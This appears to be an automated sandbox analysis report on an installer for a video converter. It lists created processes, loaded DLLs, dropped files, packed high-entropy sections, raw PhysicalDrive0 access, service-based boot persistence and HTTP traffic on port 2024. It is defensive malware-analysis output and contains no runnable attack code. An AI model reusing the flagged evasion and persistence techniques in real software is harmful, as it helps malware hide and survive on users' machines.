                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Oz2UhFBTHy.exeReversingLabs: Detection: 15%
                  Source: Oz2UhFBTHy.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                  Source: Oz2UhFBTHy.exeString found in binary or memory: /LOADINF="filename"
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeFile read: C:\Users\user\Desktop\Oz2UhFBTHy.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Oz2UhFBTHy.exe "C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp "C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp "C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -iJump to behavior
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: sqlite3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Converter Factory_is1Jump to behavior
                  Source: Oz2UhFBTHy.exeStatic file information: File size 3918263 > 1048576
                  Source: Binary string: msvcp71.pdbx# source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: msvcr71.pdb< source: is-L1OQV.tmp.2.dr
                  Source: Binary string: msvcp71.pdb source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-T8AR0.tmp.2.dr
                  Source: Binary string: msvcr71.pdb source: is-L1OQV.tmp.2.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeUnpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack _aett_6:ER;_aftt_6:R;_agtt_6:W;.rsrc:R;_ahtt_6:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeUnpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: _aett_6
                  Source: videoconverterfactory.exe.2.drStatic PE information: section name: _aett_6
                  Source: videoconverterfactory.exe.2.drStatic PE information: section name: _aftt_6
                  Source: videoconverterfactory.exe.2.drStatic PE information: section name: _agtt_6
                  Source: videoconverterfactory.exe.2.drStatic PE information: section name: _ahtt_6
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /4
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /19
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /35
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /51
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /63
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /77
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /89
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /102
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /113
                  Source: is-9MUD1.tmp.2.drStatic PE information: section name: /124
                  Source: is-T8AR0.tmp.2.drStatic PE information: section name: Shared
                  Source: VideoConverterFactory.exe.3.drStatic PE information: section name: _aett_6
                  Source: VideoConverterFactory.exe.3.drStatic PE information: section name: _aftt_6
                  Source: VideoConverterFactory.exe.3.drStatic PE information: section name: _agtt_6
                  Source: VideoConverterFactory.exe.3.drStatic PE information: section name: _ahtt_6
                  Source: sqlite3.dll.3.drStatic PE information: section name: /4
                  Source: sqlite3.dll.3.drStatic PE information: section name: /19
                  Source: sqlite3.dll.3.drStatic PE information: section name: /35
                  Source: sqlite3.dll.3.drStatic PE information: section name: /51
                  Source: sqlite3.dll.3.drStatic PE information: section name: /63
                  Source: sqlite3.dll.3.drStatic PE information: section name: /77
                  Source: sqlite3.dll.3.drStatic PE information: section name: /89
                  Source: sqlite3.dll.3.drStatic PE information: section name: /102
                  Source: sqlite3.dll.3.drStatic PE information: section name: /113
                  Source: sqlite3.dll.3.drStatic PE information: section name: /124
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040994C push 00409989h; ret 2_2_00409981
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax2_2_004062B5
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx2_2_004104E5
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx2_2_00494CB1
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx2_2_0040CE3A
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx2_2_0040F39A
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx2_2_00443444
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040546D push eax; ret 2_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040553D push 00405749h; ret 2_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004055BE push 00405749h; ret 2_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx2_2_0048567D
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0040563B push 00405749h; ret 2_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004519BC push ecx; mov dword ptr [esp], eax2_2_004519C1
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx2_2_00477B09
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx2_2_00419C2D
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx2_2_0045FD20
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
                  Source: videoconverterfactory.exe.2.drStatic PE information: section name: _aett_6 entropy: 7.751550124073949
                  Source: VideoConverterFactory.exe.3.drStatic PE information: section name: _aett_6 entropy: 7.751550124073949

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D2E8A8
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeFile created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeFile created: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\is-OIHIC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeFile created: C:\ProgramData\VideoConverterFactory\sqlite3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeFile created: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeFile created: C:\ProgramData\VideoConverterFactory\sqlite3.dllJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D2E8A8
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_0040D0BB StartServiceCtrlDispatcherA,3_2_0040D0BB

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2024 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 2024
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus,2_2_004241DC
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00424194 IsIconic,SetActiveWindow,2_2_00424194
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_00418384
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_0042285C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00417598 IsIconic,GetCapture,2_2_00417598
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,2_2_0048393C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00417CCE IsIconic,SetWindowPos,2_2_00417CCE
